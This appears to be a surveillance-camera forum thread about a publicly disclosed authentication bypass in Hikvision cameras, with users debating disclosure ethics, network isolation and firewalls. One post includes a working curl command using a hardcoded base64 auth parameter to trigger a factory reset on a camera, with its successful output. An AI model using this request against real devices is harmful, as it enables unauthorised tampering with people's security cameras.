Mike A.
Known around here
- May 6, 2017
- 4,074
- 6,836
That's why you went to all of that trouble. You can't trust any of these cams. Or many other devices either for that matter.
Backdoor found in Hikvision cameras
- Thread starter montecrypto
- Start date
That's why you went to all of that trouble. You can't trust any of these cams. Or many other devices either for that matter.
tangent
IPCT Contributor
- May 12, 2016
- 4,605
- 3,957
And sadly plenty of the people you can hire are a bit clueless when it comes to security.
We have a client that is the absolute opposite. Palo Alto Next Generation firewalls at every facility. They really aren't very worried about holes in NVRs or cams.
All remote access is done via VPN, nor ports. And the firewall is on top of any strange traffic immediately. Palo Alto stuff is NOT cheap. But when properly configured, it adds a HUGE layer of security to cams and other IOT stuff that very few are employing.
Honestly, this client has taught us a LOT.
Thanks for publishing this. I looked at your findings and tested them against an unpatched Hikvision system I had on hand. You mentioned that "all other HikCGI calls" are vulnerable to the auth bypass but did you actually test ones like the factoryReset one? From what I can see only the ones that are normally called by GET appear vulnerable and the rest (PUT ones like factoryReset) still come out as 401 Unauthorized. Perhaps I missed something? Nice find either way!
That indeed working on my IPC DS-2CD2020F
$ curl -X PUT -v http://192.168.5.20/System/factoryDefault?auth=YWRtaW46MTEK
* Hostname was NOT found in DNS cache
* Trying 192.168.5.20...
* Connected to 192.168.5.20 (192.168.5.20) port 80 (#0)
> PUT /System/factoryDefault?auth=YWRtaW46MTEK HTTP/1.1
> User-Agent: curl/7.38.0
> Host: 192.168.5.20
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 17 Sep 2017 11:31:01 GMT
* Server App-webs/ is not blacklisted
< Server: App-webs/
< Connection: close
< Content-Length: 257
< Content-Type: application/xml
<
<?xml version="1.0" encoding="UTF-8"?>
<ResponseStatus version="1.0" xmlns="Oops:The page you are visiting may have been deleted,renamed or inaccessible.">
<requestURL>/System/factoryDefault</requestURL>
<statusCode>7</statusCode>
<statusString>Reboot Required</statusString>
</ResponseStatus>
* Closing connection 0
$
I guess my cameras are not affected (DS-2CD3132-I).
But if my NVR with POE ports built into it has a different a LAN for cameras (e.g. 192.168.254.13) from my main network (e.g. 192.168.1.1, only my NVR connects to this network & it doesn't support virtual hosting for cameras) that connected to the internet I should have to worry about anything?
The only way I can reach my camera web GUI is by connecting into a free POE port on the NVR and changing my PC LAN to match the NVR LAN.
Thanks.
But if my NVR with POE ports built into it has a different a LAN for cameras (e.g. 192.168.254.13) from my main network (e.g. 192.168.1.1, only my NVR connects to this network & it doesn't support virtual hosting for cameras) that connected to the internet I should have to worry about anything?
The only way I can reach my camera web GUI is by connecting into a free POE port on the NVR and changing my PC LAN to match the NVR LAN.
Thanks.
fenderman
Staff member
- Mar 9, 2014
- 36,892
- 21,407
you are assuming that the NVR does not have any vulnerabilities...it likely has many...
Oh, I'm sure it has vulnerabilities. People just haven't found them yet & made public. When electronics come here on the slow boat from China I always suspect some kind of manufacture backdoor.
In the future I'll probably be doing a BI or Milestone build. Or upgrade my HTPC with dual Xeon and run it on that.
fenderman
Staff member
- Mar 9, 2014
- 36,892
- 21,407
giomania
IPCT Contributor
- Jun 1, 2017
- 784
- 540
Sort of related:
Infrared signals in surveillance cameras let malware jump network air gaps – Ars Technica
Sent from my iPhone using Tapatalk
Infrared signals in surveillance cameras let malware jump network air gaps – Ars Technica
Sent from my iPhone using Tapatalk
Montecrypto - why the hell you published this? I knew about this 2 years ago but knew that publishing this will make get things worse.
To be honest - we are both "rev engs" but disclosing this kind of info to the public will screw a lot of hardware and create a lot of chaos.
Even on this board. Are you happy? I'm not.
Btw. there is also heap overflow - will be fixed soon but i will not disclose it as you do. Sorry.
Job is a job, fun is a fun, but this is insane.
To be honest - we are both "rev engs" but disclosing this kind of info to the public will screw a lot of hardware and create a lot of chaos.
Even on this board. Are you happy? I'm not.
Btw. there is also heap overflow - will be fixed soon but i will not disclose it as you do. Sorry.
Job is a job, fun is a fun, but this is insane.
If you knew about this 2 years ago then why did it take Hikvision until January 2017 (about 9 months ago) to publish firmware with it fixed?
Disclosing vulnerabilities like this is standard practice, to get manufacturers and software vendors to take threats seriously, among other reasons.
Disclosing vulnerabilities like this is standard practice, to get manufacturers and software vendors to take threats seriously, among other reasons.
2 years is a little too big - time is running.
You dont understand HOW EASY is to use it using Shodan.io platform by script-kiddies just for fun now.
This bug will not hit HUGE CCTV closed systems but poor poeple who want to have a view on their homes.
And no, this is not the good way of pushing Manufacturers to treat you seriosusly.
I dont have this kind of problems with HikVision NOR Dahua.
You dont understand HOW EASY is to use it using Shodan.io platform by script-kiddies just for fun now.
This bug will not hit HUGE CCTV closed systems but poor poeple who want to have a view on their homes.
And no, this is not the good way of pushing Manufacturers to treat you seriosusly.
I dont have this kind of problems with HikVision NOR Dahua.
fenderman
Staff member
- Mar 9, 2014
- 36,892
- 21,407
He was forced to disclose it to get hikvision to take action....even if we believe your story that you knew about this vulnerability, do you think you two were the only ones? The public has a right to know....
What? Hikvision CREATED and upgrade to their FW right? So why HE HAD TO?
Nevermind - you don't understand a clue of my story.
I always published info that wont hurt anybody on this board.
The public has a right to know THAT MERCEDES CAN BE STEALED BY KID and not with INSTRUCTION ON TV HOW TO STEAL A MERCEDES CAR that even KID can use. That's the difference.
Ok, nevermind....
Nevermind - you don't understand a clue of my story.
I always published info that wont hurt anybody on this board.
The public has a right to know THAT MERCEDES CAN BE STEALED BY KID and not with INSTRUCTION ON TV HOW TO STEAL A MERCEDES CAR that even KID can use. That's the difference.
Ok, nevermind....
fenderman
Staff member
- Mar 9, 2014
- 36,892
- 21,407
Wrong...this kind of stuff will force manufactures to take security seriously...they will get a shitload of complaints...from dealers, end users, bad publicity...
Let me ask you this, please show me where hikvision has notified dealers and end users of this exploit, its missing from their press release pages...
Tolting Colt Acres
Pulling my weight
- Jun 7, 2016
- 378
- 153
Translation: "Why did you disclose the vulnerability I was using to hack many publicly accessible cameras, you bastard!?!!?"